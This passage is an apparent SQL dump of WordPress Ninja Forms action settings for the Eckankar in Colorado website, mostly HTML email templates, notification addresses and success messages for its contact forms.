id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n'),(4453,150,'attach_csv','0','attach_csv','0'),(4454,150,'email_format','html','email_format','html'),(4455,150,'reply_to','','reply_to',''),(4456,150,'cc','','cc',''),(4457,150,'bcc','','bcc',''),(4458,150,'redirect_url','','redirect_url',''),(4459,150,'success_msg','','success_msg',''),(4460,150,'label','Send copy to user','label','Send copy to user'),(4461,150,'parent_id','13','parent_id','13'),(4462,151,'objectType','Action','objectType','Action'),(4463,151,'objectDomain','actions','objectDomain','actions'),(4464,151,'editActive','','editActive',''),(4465,151,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4466,151,'payment_gateways','','payment_gateways',''),(4467,151,'payment_total','0','payment_total','0'),(4468,151,'tag','','tag',''),(4469,151,'email_message_plain','','email_message_plain',''),(4470,151,'submitter_email','','submitter_email',''),(4471,151,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4472,151,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4473,151,'set_subs_to_expire','0','set_subs_to_expire','0'),(4474,151,'subs_expire_time','90','subs_expire_time','90'),(4475,151,'title','','title',''),(4476,151,'key','','key',''),(4477,151,'type','successmessage','type','successmessage'),(4478,151,'active','1','active','1'),(4479,151,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4480,151,'date_updated','2016-01-15','date_updated','2016-01-15'),(4481,151,'from_name','','from_name',''),(4482,151,'from_address','','from_address',''),(4483,151,'to','{wp:admin_email}','to','{wp:admin_email}'),(4484,151,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4485,151,'email_message','{fields_table}','email_message','{fields_table}'),(4486,151,'attach_csv','0','attach_csv','0'),(4487,151,'email_format','html','email_format','html'),(4488,151,'reply_to','','reply_to',''),(4489,151,'cc','','cc',''),(4490,151,'bcc','','bcc',''),(4491,151,'redirect_url','','redirect_url',''),(4492,151,'success_msg','<div style=\"text-align: center\"><span style=\"font-size: 30pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div>\n\n<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\"><span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us.<br>Your message has been forwarded to the \'Spiritual Services Director\' here in Colorado.<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\">You will be contacted soon regarding your submission.</div>\n\n<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\">All the best,<i>The Eckankar in Colorado Team</i><br></div>\n\n</div>','success_msg','<div style=\"text-align: center\"><span style=\"font-size: 30pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div>\n\n<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\"><span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us.<br>Your message has been forwarded to the \'Spiritual Services Director\' here in Colorado.<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\">You will be contacted soon regarding your submission.</div>\n\n<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\">All the best,<i>The Eckankar in Colorado Team</i><br></div>\n\n</div>'),(4493,151,'label','Success Message','label','Success Message'),(4494,151,'parent_id','13','parent_id','13'),(4495,151,'drawerDisabled','','drawerDisabled',''),(4496,152,'email_message_plain','','email_message_plain',''),(4497,152,'tag','','tag',''),(4498,152,'payment_gateways','','payment_gateways',''),(4499,152,'payment_total','0','payment_total','0'),(4500,152,'objectType','Action','objectType','Action'),(4501,152,'objectDomain','actions','objectDomain','actions'),(4502,152,'editActive','','editActive',''),(4503,152,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4504,152,'title','','title',''),(4505,152,'key','','key',''),(4506,152,'type','email','type','email'),(4507,152,'active','1','active','1'),(4508,152,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4509,152,'date_updated','2016-01-19','date_updated','2016-01-19'),(4510,152,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(4511,152,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(4512,152,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(4513,152,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(4514,152,'attach_csv','0','attach_csv','0'),(4515,152,'email_format','html','email_format','html'),(4516,152,'reply_to','','reply_to',''),(4517,152,'cc','','cc',''),(4518,152,'bcc','','bcc',''),(4519,152,'redirect_url','','redirect_url',''),(4520,152,'success_msg','','success_msg',''),(4521,152,'label','Admin Email','label','Admin Email'),(4522,152,'parent_id','13','parent_id','13'),(4523,152,'email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />                                \"><h1> Eckankar In Colorado</h1><br></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr>  <td valign=\"top\" align=\"left\"><p><strong><span style=\"font-size: 20px;\">Hello! You have a new \"Book Discusson Signup\" contact form submission.</span><br><br></strong>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><p>The following person has requested contact. Here is the information that <strong><span style=\"color: #23507D; font-weight:strong;\">{field:textbox_268}</span></strong> has submitted:</p></td></tr></tbody></table><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong>&nbsp; {field:textbox_268}<br></span><span style=\"color: #333333\"><strong>LAST NAME:</strong>&nbsp; {field:lastname_269}</span><span style=\"color: #333333\"><br></span><span style=\"color: #333333\"><strong>EMAIL:</strong>&nbsp; {field:email_270}<br></span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong>&nbsp; {field:textbox_303}</span><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><br>','email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />                                \"><h1> Eckankar In Colorado</h1><br></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr>  <td valign=\"top\" align=\"left\"><p><strong><span style=\"font-size: 20px;\">Hello! You have a new \"Book Discusson Signup\" contact form submission.</span><br><br></strong>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><p>The following person has requested contact. Here is the information that <strong><span style=\"color: #23507D; font-weight:strong;\">{field:textbox_268}</span></strong> has submitted:</p></td></tr></tbody></table><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong>&nbsp; {field:textbox_268}<br></span><span style=\"color: #333333\"><strong>LAST NAME:</strong>&nbsp; {field:lastname_269}</span><span style=\"color: #333333\"><br></span><span style=\"color: #333333\"><strong>EMAIL:</strong>&nbsp; {field:email_270}<br></span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong>&nbsp; {field:textbox_303}</span><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><br>'),(4524,152,'drawerDisabled','','drawerDisabled',''),(4525,153,'title','','title',''),(4526,153,'key','','key',''),(4527,153,'type','save','type','save'),(4528,153,'active','1','active','1'),(4529,153,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4530,153,'label','Save Form','label','Save Form'),(4531,153,'objectType','Action','objectType','Action'),(4532,153,'objectDomain','actions','objectDomain','actions'),(4533,153,'editActive','','editActive',''),(4534,153,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4535,153,'payment_gateways','','payment_gateways',''),(4536,153,'payment_total','0','payment_total','0'),(4537,153,'tag','','tag',''),(4538,153,'to','{wp:admin_email}','to','{wp:admin_email}'),(4539,153,'reply_to','','reply_to',''),(4540,153,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4541,153,'email_message','{fields_table}','email_message','{fields_table}'),(4542,153,'email_message_plain','','email_message_plain',''),(4543,153,'from_name','','from_name',''),(4544,153,'from_address','','from_address',''),(4545,153,'email_format','html','email_format','html'),(4546,153,'cc','','cc',''),(4547,153,'bcc','','bcc',''),(4548,153,'redirect_url','','redirect_url',''),(4549,153,'submitter_email','','submitter_email',''),(4550,153,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4551,153,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4552,153,'set_subs_to_expire','0','set_subs_to_expire','0'),(4553,153,'subs_expire_time','90','subs_expire_time','90'),(4554,153,'parent_id','35','parent_id','35'),(4555,153,'drawerDisabled','','drawerDisabled',''),(4556,154,'title','','title',''),(4557,154,'key','','key',''),(4558,154,'type','email','type','email'),(4559,154,'active','0','active','0'),(4560,154,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4561,154,'label','Send copy to user','label','Send copy to user'),(4562,154,'objectType','Action','objectType','Action'),(4563,154,'objectDomain','actions','objectDomain','actions'),(4564,154,'editActive','','editActive',''),(4565,154,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4566,154,'payment_gateways','','payment_gateways',''),(4567,154,'payment_total','0','payment_total','0'),(4568,154,'tag','','tag',''),(4569,154,'email_message_plain','','email_message_plain',''),(4570,154,'date_updated','2016-01-15','date_updated','2016-01-15'),(4571,154,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(4572,154,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(4573,154,'to','{field:email_270}','to','{field:email_270}'),(4574,154,'email_subject','Eckankar Colorado Springs - Communication','email_subject','Eckankar Colorado Springs - Communication'),(4575,154,'email_message','<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>','email_message','<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>'),(4576,154,'attach_csv','0','attach_csv','0'),(4577,154,'email_format','html','email_format','html'),(4578,154,'reply_to','','reply_to',''),(4579,154,'cc','','cc',''),(4580,154,'bcc','','bcc',''),(4581,154,'redirect_url','','redirect_url',''),(4582,154,'success_msg','','success_msg',''),(4583,154,'parent_id','35','parent_id','35'),(4584,154,'drawerDisabled','','drawerDisabled',''),(4585,155,'title','','title',''),(4586,155,'key','','key',''),(4587,155,'type','successmessage','type','successmessage'),(4588,155,'active','1','active','1'),(4589,155,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4590,155,'label','Success Message','label','Success Message'),(4591,155,'objectType','Action','objectType','Action'),(4592,155,'objectDomain','actions','objectDomain','actions'),(4593,155,'editActive','','editActive',''),(4594,155,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4595,155,'payment_gateways','','payment_gateways',''),(4596,155,'payment_total','0','payment_total','0'),(4597,155,'tag','','tag',''),(4598,155,'email_message_plain','','email_message_plain',''),(4599,155,'submitter_email','','submitter_email',''),(4600,155,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4601,155,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4602,155,'set_subs_to_expire','0','set_subs_to_expire','0'),(4603,155,'subs_expire_time','90','subs_expire_time','90'),(4604,155,'date_updated','2016-01-15','date_updated','2016-01-15'),(4605,155,'from_name','','from_name',''),(4606,155,'from_address','','from_address',''),(4607,155,'to','{wp:admin_email}','to','{wp:admin_email}'),(4608,155,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4609,155,'email_message','{fields_table}','email_message','{fields_table}'),(4610,155,'attach_csv','0','attach_csv','0'),(4611,155,'email_format','html','email_format','html'),(4612,155,'reply_to','','reply_to',''),(4613,155,'cc','','cc',''),(4614,155,'bcc','','bcc',''),(4615,155,'redirect_url','','redirect_url',''),(4616,155,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(4617,155,'parent_id','35','parent_id','35'),(4618,155,'drawerDisabled','','drawerDisabled',''),(4619,156,'title','','title',''),(4620,156,'key','','key',''),(4621,156,'type','email','type','email'),(4622,156,'active','1','active','1'),(4623,156,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(4624,156,'label','Admin Email','label','Admin Email'),(4625,156,'email_message_plain','','email_message_plain',''),(4626,156,'tag','','tag',''),(4627,156,'payment_gateways','','payment_gateways',''),(4628,156,'payment_total','0','payment_total','0'),(4629,156,'objectType','Action','objectType','Action'),(4630,156,'objectDomain','actions','objectDomain','actions'),(4631,156,'editActive','','editActive',''),(4632,156,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4633,156,'date_updated','2016-01-19','date_updated','2016-01-19'),(4634,156,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(4635,156,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(4636,156,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(4637,156,'email_subject','Mountain Areas - Form Record Received','email_subject','Mountain Areas - Form Record Received'),(4638,156,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR Mountain Areas<br></u></h1><h3>You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</h3><h3>Here is a copy of the information submitted by {field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\"><br>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR Mountain Areas<br></u></h1><h3>You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</h3><h3>Here is a copy of the information submitted by {field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\"><br>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>'),(4639,156,'drawerDisabled','','drawerDisabled',''),(4640,156,'attach_csv','0','attach_csv','0'),(4641,156,'email_format','html','email_format','html'),(4642,156,'reply_to','','reply_to',''),(4643,156,'cc','','cc',''),(4644,156,'bcc','','bcc',''),(4645,156,'redirect_url','','redirect_url',''),(4646,156,'success_msg','','success_msg',''),(4647,156,'parent_id','35','parent_id','35'),(4648,153,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4649,37,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4650,29,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4651,45,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4652,61,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4653,69,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4654,125,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4655,41,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4656,53,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4657,57,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4658,73,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4659,85,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4660,89,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4661,31,'drawerDisabled','','drawerDisabled',''),(4774,161,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4775,161,'submitter_email','','submitter_email',''),(4776,161,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4777,161,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4778,161,'set_subs_to_expire','0','set_subs_to_expire','0'),(4779,161,'subs_expire_time','90','subs_expire_time','90'),(4780,161,'title','','title',''),(4781,161,'key','','key',''),(4782,161,'type','save','type','save'),(4783,161,'active','1','active','1'),(4784,161,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(4785,161,'label','Save Form','label','Save Form'),(4786,161,'objectType','Action','objectType','Action'),(4787,161,'objectDomain','actions','objectDomain','actions'),(4788,161,'editActive','','editActive',''),(4789,161,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(4790,161,'payment_gateways','','payment_gateways',''),(4791,161,'payment_total','0','payment_total','0'),(4792,161,'tag','','tag',''),(4793,161,'to','{wp:admin_email}','to','{wp:admin_email}'),(4794,161,'reply_to','','reply_to',''),(4795,161,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4796,161,'email_message','{fields_table}','email_message','{fields_table}'),(4797,161,'email_message_plain','','email_message_plain',''),(4798,161,'from_name','','from_name',''),(4799,161,'from_address','','from_address',''),(4800,161,'email_format','html','email_format','html'),(4801,161,'cc','','cc',''),(4802,161,'bcc','','bcc',''),(4803,161,'redirect_url','','redirect_url',''),(4804,161,'parent_id','8','parent_id','8'),(4805,161,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4806,162,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 